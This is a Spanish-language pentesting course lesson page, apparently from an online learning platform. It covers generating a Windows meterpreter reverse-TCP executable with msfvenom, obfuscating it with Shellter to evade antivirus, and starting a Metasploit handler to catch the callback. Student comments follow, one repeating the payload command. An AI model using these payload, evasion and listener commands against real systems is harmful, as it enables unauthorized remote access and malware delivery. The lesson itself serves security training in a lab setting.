Introducción al pentesting a redes

1

Pruebas de Penetración en Redes: Exploit y Mitigación

2

Configuración de Redes Virtuales con VirtualBox

3

Seguridad en Redes: Técnicas Avanzadas de Pentesting

4

Configuración y Funcionamiento de Servidores DHCP en Redes Locales

5

Configuración de Protocolos de Enrutamiento Dinámico en Redes

6

Configuración de RIP en Quagga para Redes IPv4 en Linux

7

Configuración de Protocolo RIP en Redes Simuladas

8

Configuración de N Add para traducción de direcciones IP

9

Traducción de Direcciones IP: NAT y su Aplicación Práctica

10

DNS: Obtención de Subdominios con Herramientas de Seguridad

Ataques a protocolos de red

11

Ataques de Ingeniería Social en Seguridad Informática

12

Ataques DNS: Redirección y Manipulación en Redes Locales

13

Ataques Hombre en el Medio usando DHCP Spoofing

14

Creación de Paquetes Personalizados con Scapy en Python

15

Monitoreo de Tráfico y Alteración de Redes con RIPv2

16

"Configuración de Interfaces en Redes Ficticias con Domi"

17

Análisis de Vulnerabilidades en Redes con NAT y Explotación de Puertos

18

Inyección de Datos en Redes Internas: Estrategias y Precauciones

Ataques de ingeniería social

19

Falsificación de Sitios Web para Captura de Credenciales

20

Ingeniería Social con SET: Ataques y Captura de Credenciales

21

"Uso de Metasploit para Ofuscación y Ejecución de Exploits"

22

Técnicas de Ataque de Clonación y Redirección Web con SET

Ataques de denegación de servicio

23

Ataques de Denegación de Servicio: Estrategias y Mitigación

24

Ataques de Denegación de Servicio con Hping3 en Kali Linux

25

Ataques de Denegación de Servicio: Estrategias y Ejecución

26

Ataques DDoS: Uso de Herramientas Comunes y Medidas Preventivas

27

Ataques de Denegación de Servicio: Estrategias y Herramientas

Ataques a redes inalámbricas

28

Intercepción de Tráfico y Contraseñas en Redes WiFi Seguras

29

Auditoría de Redes WiFi: Configuración y Monitoreo Avanzado

30

Obtención de Contraseñas WiFi con Aircrack y Airodump

31

Cifrado WPA2: Captura y Desencriptación de Contraseñas Wi-Fi

Conclusiones, creación de informe y bibliografía

32

Explotación de Vulnerabilidades en Protocolo DNS

33

Seguridad Informática: Análisis de Vulnerabilidades Red y Criptografía

No tienes acceso a esta clase

¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera

"Uso de Metasploit para Ofuscación y Ejecución de Exploits"

21/33
Recursos

¿Cómo combinar estrategias de pentesting?

Pentesting, o pruebas de penetración, es un enfoque riguroso para evaluar la seguridad de un sistema. La clave del éxito como pentester es la capacidad de combinar diferentes estrategias y enfoques desde distintos ángulos. La adaptabilidad es crucial; es fundamental conocer múltiples herramientas y cómo usarlas en diversos escenarios. Así logramos sobrepasar obstáculos o problemas inesperados que surjan en el camino. Aquí exploraremos cómo aplicar estas estrategias combinando diversas tecnologías y técnicas.

¿Qué es el comando MSFvenom y cómo se utiliza?

MSFvenom es una herramienta poderosa dentro de la suite Metasploit que permite generar payloads o cargas útiles en múltiples formatos. Un payload es un fragmento de código diseñado para ejecutarse con un propósito específico, generalmente para obtener acceso remoto a una máquina.

Ejemplo de uso del comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.103 LPORT=4444 -f exe -o archivo.exe

Aquí se crea un archivo ejecutable (en formato .exe) que contiene un payload meterpreter usando el protocolo TCP inverso. Mediante LHOST y LPORT, se especifican la dirección IP y el puerto al cual se conectará la máquina objetivo una vez comprometida.

¿Para qué se usa la herramienta Shelter?

Shelter es una herramienta utilizada para ofuscar código. La ofuscación se utiliza para proteger el código haciendo difícil su análisis o detección por antivirus. Así, el código malicioso pasa inadvertido y no es bloqueado.

Para empezar, utilizamos el modo automático:

shelter.exe -f archivo.exe

Esta herramienta procesa el archivo para ocultar su propósito original, transformándolo en un archivo menos evidente para los sistemas de defensa, sin modificar su funcionalidad maliciosa.

¿Cómo montar el entorno con Metasploit?

Metasploit es una suite esencial para pruebas de seguridad, ampliamente usada para desarrollar y ejecutar exploits contra un sistema remoto. Para preparar el entorno en Metasploit, primero se inicia el servicio de su base de datos:

service postgresql start
msfconsole

Una vez en la consola de Metasploit, se selecciona el módulo correspondiente y se configuran los parámetros:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.103
set LPORT 4444

Finalmente, el exploit se ejecuta con el comando:

exploit

Esta configuración permite que el sistema esté preparado para escuchar conexiones, listo para recibir intentos de acceso a través del payload previamente configurado.

¿Cuál es la importancia de combinar herramientas y metodologías?

La combinación de herramientas y metodologías no solo mejora la efectividad del pentesting, sino que también aumenta las probabilidades de éxito en diversas situaciones. Trabajar con diferentes herramientas y aproximaciones permite una flexibilidad crucial para sortear desafíos singulares que podrían surgir durante las pruebas. Además:

  • Diversidad de herramientas significa múltiples soluciones para problemas similares.
  • Al estar bien preparado, es posible actuar ante situaciones inesperadas.
  • La familiaridad con diversas herramientas proporciona un enfoque integral en las pruebas de seguridad, ampliando el espectro de análisis y posibles resultados.

Con estas estrategias, se puede avanzar más eficientemente en la tarea de evaluar y reforzar la seguridad de un sistema. Con perseverancia y práctica diligente, cada paso en el aprendizaje del pentesting refuerza no solo la habilidad técnica, sino también la capacidad de anticipar posibles fallas de seguridad. ¡Continúa adelante en tu camino de aprendizaje!

Aportes 5

Preguntas 2

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad?

En caso no hayan pasado antes por el curso de fundamentos, les hago saber que SHELLTER no viene preinstalada en las ultimas versiones de Kali, por ello deberán instalarlo. Shellter funciona en arquitecturas de 32 bits, por ello, en caso usen una de 64 bit, deberán agregar esa arquitectura con el siguiente comando
dpkg --add-architecture i386 && apt update && apt -y install wine32

Voy a dar un consejo, quizás muchos llegan a este punto sin practicar, porque se les perdió la conexión entre maquinas y no sabían como restablecerlas luego de usar determinadas herramientas, o cambiar las configuraciones, la verdad es que quizás con justa razón, Juan Pablo asume que podrán corregir esos problemas y el siguiente video lo empieza habiendo cambiado la configuración hecha en el anterior. Bueno, sin mas embrollo, si eso les pasa y por ello están pensando en abandonar, solo vuelvan hacer la configuración de RIP en el router uno y luego reinicien los servicios en router 2 y seguidamente router 1, y se les restablecerá la conexión, ah claro, deben también editar los archivos de /etc/network/inetrfaces de la maquina Kali que hayan cambiado o en todo caso apáguenla y vuelvan a prenderla, dado que las configuraciones son temporales
Saludos

No me suelen gustar las versiones boot porque generan muchos problemas de compatibilidad con los paquetes cuando se hacen actualizaciones o se descargan herramientas nuevas. Tuve que descargar e instalar de nuevo una versión installer de Kali, porque la live no me permitió descargar shellter por falta de espacio y por incompatibilidades con el manejador de paquetes.

hoy a dia, estan a unos pocos dias de salir un nuevocurso de metasploit

Sí no les aparece el archivo.exe auqnue les diga que ya lo creo, intenten así:
msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST:10.0.15 LPORT=444 -o archivo.exe